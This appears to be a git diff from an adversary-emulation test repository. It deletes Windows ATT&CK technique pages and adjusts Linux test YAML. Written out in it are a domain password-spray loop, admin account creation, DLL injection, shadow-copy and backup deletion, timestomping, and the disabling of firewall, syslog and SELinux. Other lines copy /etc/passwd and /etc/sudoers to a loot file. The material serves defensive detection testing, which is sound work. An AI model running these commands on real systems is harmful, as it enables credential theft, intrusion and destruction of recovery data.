diff --git a/Windows/Credential_Access/Brute_Force.md b/Windows/Credential_Access/Brute_Force.md
deleted file mode 100644
index 4ce257ed..00000000
--- a/Windows/Credential_Access/Brute_Force.md
+++ /dev/null
@@ -1,16 +0,0 @@
-# Brute Force
-
-MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
-
-## net.exe
-
-### Password Spray
-
-
- net user /domain > DomainUsers.txt
- echo "Password1" >> pass.txt
- echo "1q2w3e4r" >> pass.txt
-
-Execute:
-
- @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
diff --git a/Windows/Credential_Access/Create_Account.md b/Windows/Credential_Access/Create_Account.md
deleted file mode 100644
index a96139c7..00000000
--- a/Windows/Credential_Access/Create_Account.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Create Account
-
-MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
-
-## Net.exe
-
-Local user add:
-
- Net user /add Trevor SmshBgr123
-
-Add new user to localgroup:
-
- net localgroup administrators Trevor /add
-
-Domain add:
-
- net user \password \domain
-
-Add user to Active Directory:
-
- dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
-
-# Powershell 5.1
-
-The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
-
-Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
-
-## Add User
-
- New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account'
-
-## Create a group
-
- New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
diff --git a/Windows/Credential_Access/Credentials_in_Files.md b/Windows/Credential_Access/Credentials_in_Files.md
deleted file mode 100644
index 334e28c1..00000000
--- a/Windows/Credential_Access/Credentials_in_Files.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# Credentials in Files
-
-MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
-
-## Group Policy Preference
-
-[Payload](Payloads/Get-GPPPassword.ps1)
-[PowerSploit Source](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
-
-Input:
-
- Get-GPPPassword -Server EXAMPLE.COM
diff --git a/Windows/Credential_Access/Hooking.md b/Windows/Credential_Access/Hooking.md
deleted file mode 100755
index 10dccc23..00000000
--- a/Windows/Credential_Access/Hooking.md
+++ /dev/null
@@ -1,12 +0,0 @@
-## Hooking
-
-MITRE ATT&CK Technique: [T1179](https://attack.mitre.org/wiki/Technique/T1179)
-
-### Sample Windows DLL Injection into PowerShell
-
- mavinject $pid /INJECTRUNNING C:\Atomic\AtomicSSLHook.dll
-
-## Test Script
-
-[AtomicSSLHook.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AtomicSSLHook.dll)
-
diff --git a/Windows/Defense_Evasion/File_Deletion.md b/Windows/Defense_Evasion/File_Deletion.md
deleted file mode 100644
index fd2736af..00000000
--- a/Windows/Defense_Evasion/File_Deletion.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# File Deletion
-
-MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
-
-## cmd
-
- del /f filename
- rmdir example
-
-## PowerShell
-
- Remove-Item –path c:\testfolder –recurse
-
-## vssadmin
-
- vssadmin.exe Delete Shadows /All /Quiet
-
-
-## wmic
-
- wmic shadowcopy delete
-
-## bcdedit
-
- bcdedit /set {default} bootstatuspolicy ignoreallfailures
-
- bcdedit /set {default} recoveryenabled no
-
-## wbadmin
-
- wbadmin delete catalog -quiet
diff --git a/Windows/Defense_Evasion/Hidden_Files_and_Directories.md b/Windows/Defense_Evasion/Hidden_Files_and_Directories.md
deleted file mode 100644
index cd1b9651..00000000
--- a/Windows/Defense_Evasion/Hidden_Files_and_Directories.md
+++ /dev/null
@@ -1,18 +0,0 @@
-## Hidden Files and Directories
-
-MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
-
-
-Input:
-
-Hide a file:
-
- attrib.exe +h filename.exe
-
-Mark as hidden, system file and read only:
-
- attrib.exe +h +s +r evil.dll
-
-List hidden files:
-
- dir /a
diff --git a/Windows/Defense_Evasion/Timestomp.md b/Windows/Defense_Evasion/Timestomp.md
deleted file mode 100644
index 31a4144f..00000000
--- a/Windows/Defense_Evasion/Timestomp.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Timestomp
-
-MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
-
-## Timestomp with PowerShell
-
- #### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
-
- echo "Atomic Test File" > test.txt
- PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
diff --git a/Windows/Discovery/Account_Discovery.md b/Windows/Discovery/Account_Discovery.md
deleted file mode 100644
index 1f6af058..00000000
--- a/Windows/Discovery/Account_Discovery.md
+++ /dev/null
@@ -1,85 +0,0 @@
-## Account Discovery
-
-MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
-
-## Test Script
-
-[Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/Discovery.bat)
-
-### Net.exe
-
-Domain Group Enumeration:
-
- net group "domain admins" /domain
-
-Domain User Enumeration:
-
- net user /domain
-
-Local Group Enumeration:
-
- net localgroup "administrators"
-
-Local User Enumeration:
-
- net user
-
-Input:
-
- net use
-
-Input:
-
- net share
-
-Input:
-
- net view
-
-Input:
-
- net accounts
-
-## wmic.exe
-
-### Reconnaissance
-
-Input:
-
- wmic useraccount get /ALL
-
-Input:
-
- wmic useraccount list
-
-Input:
-
- wmic startup list brief
-
-Input:
-
- wmic share list
-
-Input:
-
- wmic service get name,displayname,pathname,startmode
-
-Input:
-
- wmic process list brief
-
-Input:
-
- wmic process get caption,executablepath,commandline
-
-Input:
-
- wmic qfe get description,installedOn /format:csv
-
-Input:
-
- wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
-
-Input:
-
- get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md
deleted file mode 100644
index ac2307f9..00000000
--- a/Windows/Exfiltration/Data_Compressed.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# File Deletion
-
-MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
-
-## PowerShell
-
- powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip
-
-## Rar
-
- rar a -r exfilthis.rar *.docx
diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md
deleted file mode 100644
index 3550fb8c..00000000
--- a/Windows/Persistence/Browser_Extensions.md
+++ /dev/null
@@ -1,24 +0,0 @@
-## Browser Extensions
-
-MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
-
-
-### Chrome (Developer Mode)
-
-Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
-
-Then click 'Select'
-
-### Chrome (Chrome Web Store)
-
-Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
-
-### Firefox
-
-Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
-
-Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
-
-Then click 'Open'
\ No newline at end of file
diff --git a/Windows/Persistence/Component_Object_Model_Hijacking.md b/Windows/Persistence/Component_Object_Model_Hijacking.md
deleted file mode 100644
index 7bfef287..00000000
--- a/Windows/Persistence/Component_Object_Model_Hijacking.md
+++ /dev/null
@@ -1,17 +0,0 @@
-# Component Object Model Hijacking
-
-MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
-
-## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute.
-
-#### The presence of objects within
-
- HKEY_CURRENT_USER\Software\Classes\CLSID\
-
-#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in
-
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
-
-## Test Script
-
-[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts)
diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml
index d063354a..8cd0263e 100644
--- a/atomics/T1087/T1087.yaml
+++ b/atomics/T1087/T1087.yaml
@@ -1,7 +1,7 @@ --- -attack_technique: t1087 +attack_technique: T1087 display_name: Account Discovery - + atomic_tests: - name: List all accounts description: |
@@ -14,7 +14,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/passwd > #{output_file}
@@ -30,7 +30,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/sudoers > #{output_file}
@@ -46,7 +46,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | grep 'x:0:' /etc/passwd > #{output_file}
@@ -57,7 +57,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: sh command: | username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
@@ -67,13 +67,13 @@ atomic_tests: xxx supported_platforms: - linux - - macos + - macos args: output_file: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | lastlog > #{output_file}
diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 037052e3..ed4c46fe 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -1,14 +1,14 @@ --- -attack_technique: t1089 +attack_technique: T1089 display_name: Disabling Security Tools - + atomic_tests: - name: Disable iptables firewall description: | Disables the iptables firewall supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -27,7 +27,7 @@ atomic_tests: Disables syslog collection supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -44,7 +44,7 @@ atomic_tests: Disable the Cb Response service supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -61,7 +61,7 @@ atomic_tests: Disables SELinux enforcement supported_platforms: - linux - executor: + executor: name: sh command: | setenforce 0
diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml
index 5c1fca36..b2905803 100644
--- a/atomics/T1099/T1099.yaml
+++ b/atomics/T1099/T1099.yaml
@@ -1,7 +1,7 @@ --- -attack_technique: t1099 +attack_technique: T1099 display_name: Timestomp - + atomic_tests: - name: Set a file's access timestamp description: |
@@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor:
@@ -25,7 +25,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor:
@@ -44,7 +44,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor: